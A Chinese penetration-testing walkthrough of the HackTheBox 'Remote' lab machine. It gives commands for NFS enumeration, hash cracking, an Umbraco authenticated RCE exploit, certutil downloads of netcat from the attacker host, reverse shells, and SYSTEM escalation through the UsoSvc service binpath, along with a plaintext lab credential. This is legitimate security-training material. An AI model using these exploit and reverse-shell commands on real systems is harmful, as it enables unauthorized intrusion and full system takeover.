渗透测试靶机练习No.116 HTB:Remote

靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Remote

靶场: HackTheBox.com

靶机名称: Remote

难度: 简单

提示信息:

 无

目标: user.txt和root.txt

实验环境

 攻击机:Manjaro 10.10.16.4
 
 靶机:10.10.10.180

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo nmap -p- --min-rate 10000 10.10.10.180

 sudo nmap -sC -sV -p 21,80,111,135,139,445,2049,5985,47001 10.10.10.180 -oN nmap.log

扫描到多个开放端口，发现21（FTP）可以匿名访问，先来看看21端口

ftp里面是空的没有利用价值，再来看看445端口

 smbmap -H 10.10.10.180

 smbclient -L 10.10.10.180

SMB攻击失败，再来看看80端口

Web渗透

 http://10.10.10.180

在CONTACT中发现后台地址，看名字是umbraco程序，查找是否存在漏洞

发现多个漏洞，但是不知道版本，再看看其他端口

NFS服务

 showmount -e 10.10.10.180

发现共享目录，权限是everyone（所有人)，挂载到本地搜集信息

 mkdir /tmp/site_backups
 sudo mount -t nfs 10.10.10.180:/site_backups /tmp/site_backups -o nolock

挂载成功，进入目录查看

看内容确认是umbraco网站的备份，搜集敏感信息

 cat Web.config

在Web.config中确认版本为7.12.4，该版本存在远程命令执行漏洞（RCE）但是需要认证，再来搜集账号密码

 find ./ |grep -rin admin

发现App_Data/Logs/UmbracoTraceLog.intranet.txt文件内存储账号[email protected]登录信息，继续收集密码

 find ./ |grep -rin [email protected] |grep passw

找到一个二进制文件中包含[email protected]和pass，查看内容

 strings App_Data/Umbraco.sdf

发现加密后的密码，尝试解密

 https://www.somd5.com/

拿到密码，再来看看exp

 https://www.exploit-db.com/exploits/49488

下载exp

 wget https://www.exploit-db.com/download/49488
 mv 49488 exp.py

下载完成，验证exp

 py3 exp.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c whoami

命令执行成功，当前是iis权限，上传nc反弹shell到攻击上

1。攻击机在NC目录下开启HTTP服务

 py3 -m http.server

2。靶机下载nc64.exe（上传到public目录是因为iis权限在这个目录可写）

 py3 exp.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c cmd.exe -a'/c certutil.exe -urlcache -split -f http://10.10.16.4:8000/nc64.exe c:/users/public/nc.exe'

上传成功，继续

3。攻击机监听4444端口

 nc -lvvp 4444

4。靶机执行反弹命令

 py3 exp.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c cmd.exe -a'/c c:/users/public/nc.exe 10.10.16.4 4444 -e powershell'

反弹成功，继续搜集敏感信息

 cd c:users
 ls
 cd public
 ls
 type user.txt

拿到user.txt，继续搜集

提权

上传提权辅助工具winPEASx64.exe

 certutil.exe -urlcache -split -f http://10.10.16.4:8000/winPEASx64.exe wp.exe

执行提权辅助工具

 ./wp.exe

发现当前用户IIS对UsoSvc服务有开启关闭权限，来看看这个服务如何利用

 sc.exe qc UsoSvc

替换服务中的程序路径，再重新启动服务

1。攻击机监听3333端口

 nc -lvvp 3333

2。靶机上服务中的程序路径

 sc.exe config UsoSvc binpath= "c:userspublicnc.exe 10.10.16.4 3333 -e powershell"

3。重启UsoSvc服务

 sc.exe stop UsoSvc
 sc.exe start UsoSvc

反弹成功，并且到system权限，但是有个问题这个shell很快就会断开，解决方法就是靶机上再开个2222端口，当3333反弹成功时立即执行一个反弹命令到攻击机的2222端口

 c:userspublicnc.exe 10.10.16.4 2222 -e powershell

现在拿到一个稳定的shell了，找找最后的flag

 cd c:usersadministrator
 ls
 cd desktop
 ls
 type root.txt

拿到root.txt，游戏结束

原文始发于微信公众号（伏波路上学安全）：渗透测试靶机练习No.116 HTB:Remote